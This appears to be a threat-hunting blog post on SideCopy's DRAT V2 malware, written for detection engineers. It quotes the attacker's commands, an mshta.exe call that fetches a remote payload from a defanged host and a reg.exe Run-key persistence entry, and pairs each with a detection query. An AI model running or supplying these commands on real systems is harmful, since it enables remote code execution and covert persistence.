177. Hunting for SideCopy's DRAT V2

Hello everyone!

Let's look at another example of leveraging ClickFix technique. This time it's SideCopy - a sub-cluster of Transparent Tribe. Recently Recorded Future reported on a new version of DRAT - let's look at some detection and hunting opportunities.

First of all, the adversary abuses mshta.exe:

C:\Windows\System32\mshta.exe hxxps://trade4wealth[.]in/admin/assets/css/default/index.php

It's a great candidate for hunting! For example, we can search for mshta.exe executing files from remote servers:

event_type: "processcreatewin"

AND

proc_file_name: "mshta.exe"

AND

cmdline: ("http" OR "https")

Next - it abuses reg.exe to establishes persistence for DRAT:

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Edgre" /t REG_SZ /F /D "cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf

Here we can hunt for adding files located under %PUBLIC% to the Run key, for example:

event_type: "processcreatewin"

AND

proc_file_name: "reg.exe"

AND

cmdline: ("add" AND "run" AND "public")

Finally, the adversary executes cmd.exe to run a masquaraded malicious file from %PUBLIC%, and this is another hunting opportunity:

event_type: "processcreatewin"

AND

proc_file_name: "cmd.exe"

AND

cmdline: ("start" AND "public")

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge